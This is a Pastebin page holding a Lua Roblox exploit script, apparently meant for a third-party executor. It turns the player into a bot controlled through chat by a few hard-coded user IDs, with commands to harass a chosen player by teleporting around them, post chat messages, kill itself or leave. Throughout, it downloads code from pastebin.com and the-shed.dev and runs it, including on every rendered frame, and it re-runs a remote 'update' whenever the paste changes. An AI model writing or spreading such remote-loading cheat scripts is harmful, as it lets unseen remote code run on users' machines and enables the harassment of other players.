Advertisement
DracoFAAD

Bot commands

Feb 13th, 2023 (edited)
154
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 4.78 KB | None | 0 0
  1. print("Checking username...")
  2. if game.Players.LocalPlayer.Name ~= "Iliketomoveit007" then
  3. local createdScript = game:HttpGet("https://pastebin.com/raw/akqT9Gtr")
  4.  
  5. print("OMG")
  6.  
  7. local GName = "LoadedExecutorLioner" .. game.Players.LocalPlayer.Name
  8. local random = Random.new() local letters = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '1', '2', '3', '4', '5', "6", "7", "8", "9", "0"} function getRandomLetter() return letters[random:NextInteger(1,#letters)] end function getRandomString(length, includeCapitals) local length = length or 10 local str = '' for i=1,length do local randomLetter = getRandomLetter() if includeCapitals and random:NextNumber() > .5 then randomLetter = string.upper(randomLetter) end str = str .. randomLetter end return str end
  9. local UUID = getRandomString(20, true)
  10. _G[GName] = UUID
  11. local stopped = false
  12. spawn(function()
  13.     while wait(1) do
  14.         print(game:HttpGet("https://pastebin.com/raw/akqT9Gtr") ~= createdScript)
  15.         if game:HttpGet("https://pastebin.com/raw/akqT9Gtr") ~= createdScript then
  16.             if stopped then return end
  17.             loadstring(game:HttpGet("https://pastebin.com/raw/ybdsM1rg"))()
  18.             game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Updated.", "All")
  19.             stopped = true
  20.         end
  21.     end
  22. end)
  23. spawn(function()
  24.     while wait() do
  25.         if _G[GName] ~= UUID then
  26.             stopped = true
  27.         end
  28.     end
  29. end)
  30. print("Executed!")
  31. local cmdLib = loadstring(game:HttpGet("https://pastebin.com/raw/akqT9Gtr"))().createHandler("d!", {1323364853, 782399409, 12729037, 2901097600})
  32. local annoyingPlayer = nil
  33. local annoyPlayerRange = 4
  34.  
  35. function getPlayerByName(name)
  36.     local foundPlayer = nil
  37.     for i, v in pairs(game:GetService("Players"):GetPlayers()) do
  38.         if foundPlayer == nil then
  39.             if string.match(v.Name, "^" .. name) then
  40.                 foundPlayer = v
  41.             end
  42.         end
  43.     end
  44.     return foundPlayer
  45. end
  46.  
  47. cmdLib.createCommand("annoy", function(plr, args)
  48.     if #args == 0 then return end
  49.     if stopped then return end
  50.  
  51.     local foundPlayer = getPlayerByName(args[1])
  52.  
  53.     if foundPlayer ~= nil then
  54.         annoyingPlayer = foundPlayer
  55.     end
  56. end)
  57.  
  58. cmdLib.createCommand("unannoy", function()
  59.     if stopped then return end
  60.     annoyingPlayer = nil
  61. end)
  62.  
  63. cmdLib.createCommand("say", function(_, args)
  64.     if stopped then return end
  65.     game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer(table.concat(args, " "), "All")
  66. end)
  67.  
  68.  
  69. cmdLib.createCommand("bring", function(plr)
  70.     if stopped then return end
  71.     local localPlayerChar = game:GetService("Players").LocalPlayer.Character  
  72.     local hostChar = workspace[plr.Name]
  73.  
  74.     localPlayerChar:SetPrimaryPartCFrame(hostChar.PrimaryPart.CFrame)
  75. end)
  76.  
  77. cmdLib.createCommand("to", function(plr, args)
  78.     if stopped then return end
  79.     if #args == 0 then return end
  80.     local localPlayerChar = game:GetService("Players").LocalPlayer.Character  
  81.     local hostChar = workspace[getPlayerByName(args[1]).Name]
  82.  
  83.     localPlayerChar:SetPrimaryPartCFrame(hostChar.PrimaryPart.CFrame)
  84. end)
  85.  
  86. cmdLib.createCommand("leave", function()
  87.     if stopped then return end
  88.     game.Players.LocalPlayer:Kick("Left Game")
  89. end)
  90.  
  91. cmdLib.createCommand("update", function()
  92.     if stopped then return end
  93.     loadstring(game:HttpGet("https://pastebin.com/raw/ybdsM1rg"))()
  94.     game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Updated.", "All")
  95. end)
  96.  
  97. cmdLib.createCommand("kill", function()
  98.     if stopped then return end
  99.     game.Players.LocalPlayer.Character.Humanoid.Health = 0
  100. end)
  101.  
  102. cmdLib.createCommand("rejoin", function()
  103.     if stopped then return end
  104.     local ts = game:GetService("TeleportService")
  105.     local p = game:GetService("Players").LocalPlayer
  106.     ts:Teleport(game.PlaceId, p)
  107. end)
  108.  
  109. game:GetService("RunService").RenderStepped:Connect(function()
  110.     if stopped then return end
  111.                 local annoyingPlayerChar = annoyingPlayer.Character
  112.             local localPlayerChar = game:GetService("Players").LocalPlayer.Character  
  113.  
  114.             loadstring(game:HttpGet("https://the-shed.dev/scripts/headless.lua", true))()
  115.  
  116.             local xOffset = math.random(-annoyPlayerRange, annoyPlayerRange)
  117.             local zOffset = math.random(-annoyPlayerRange, annoyPlayerRange)
  118.             local yOffset = math.random(-annoyPlayerRange, annoyPlayerRange)
  119.  
  120.             localPlayerChar:SetPrimaryPartCFrame(
  121.                 CFrame.new(Vector3.new(
  122.                     annoyingPlayerChar.PrimaryPart.Position.X + xOffset,
  123.                     annoyingPlayerChar.PrimaryPart.Position.Y + yOffset,
  124.                     annoyingPlayerChar.PrimaryPart.Position.Z + zOffset
  125.                 ))
  126.             )
  127. end)
  128. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement